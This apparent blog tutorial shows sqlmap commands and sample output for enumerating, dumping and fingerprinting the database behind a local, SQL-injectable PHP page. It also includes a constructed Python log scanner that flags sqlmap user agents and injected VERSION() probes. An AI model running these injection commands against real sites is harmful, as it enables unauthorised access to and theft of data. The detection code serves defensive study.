In the previous post we learnt how to use sqlmap to hack a vulnerable web application and fetch the list of databases, tables, columns and data rows. In this post we shall see how to do some simple fingerprinting on the remote database to find valuable information that can be used to assist in further exploitation of a system.
So let's say we have a vulnerable URL
http://localhost/weak.php?id=10
where the id parameter is not escaped properly in the PHP code and is vulnerable to SQL injection. The command to list the databases would be
$ python ./sqlmap.py -u "http://localhost/weak.php?id=10" --dbs
Then use the -T, --columns and --dump options to list the tables of a database, the columns of a table, the data in a table and so on.
Fingerprinting the remote system and its database
To find out more information about the remote system's database, use the option "-b". It will try to find the exact banner of the database server. Let's try it on a MySQL database.
$ python sqlmap.py -u "http://localhost/weak.php?id=10" -b
.....
the back-end DBMS is MySQL
fetching banner
running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
retrieved: 5.1.61
web server operating system:...
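An added example, not part of the original post: a small access-log check a defender could run to spot the requests described above against weak.php. It assumes Apache combined log format; the log lines, the function names (classify, scan) and the reason labels are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = [
    '127.0.0.1 - - [01/Jan/2024:10:00:00 +0000] "GET /weak.php?id=10 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '127.0.0.1 - - [01/Jan/2024:10:00:05 +0000] "GET /weak.php?id=10 HTTP/1.1" 200 512 "-" "sqlmap/1.0 (https://sqlmap.org)"',
    '127.0.0.1 - - [01/Jan/2024:10:00:09 +0000] "GET /weak.php?id=10%20AND%20VERSION()%20IS%20NOT%20NULL HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '127.0.0.1 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?page=2 HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

# Request line, status, size, referer, user agent.
LINE_RE = re.compile(
    r'"(?:GET|POST) (?P<url>\S+) HTTP/[\d.]+" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# MySQL exposes its banner through VERSION() and @@version.
VERSION_PROBE_RE = re.compile(r"@@version|\bversion\s*\(", re.IGNORECASE)


def classify(line, path="/weak.php", param="id"):
    """Return the reasons a logged request looks like injection or fingerprinting."""
    m = LINE_RE.search(line)
    if not m:
        return []
    reasons = []
    # The User-Agent is client-controlled, so this is only a weak signal.
    if m.group("ua").lower().startswith("sqlmap/"):
        reasons.append("sqlmap-user-agent")
    url = urlsplit(m.group("url"))
    if url.path == path:
        # parse_qs percent-decodes the values before we inspect them.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if not re.fullmatch(r"[0-9]+", value):
                reasons.append("non-numeric-id")  # id should only ever be an integer
            if VERSION_PROBE_RE.search(value):
                reasons.append("version-probe")   # banner fingerprinting attempt
    return reasons


def scan(lines):
    """Return (line index, reasons) for every suspicious line."""
    return [(i, r) for i, line in enumerate(lines) if (r := classify(line))]


if __name__ == "__main__":
    for index, reasons in scan(SAMPLE_LOG):
        print(index, ", ".join(reasons))
```

The non-numeric check is the stronger signal here, because a legitimate request to this page never carries anything but digits in id.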
How to hack remote database with sqlmap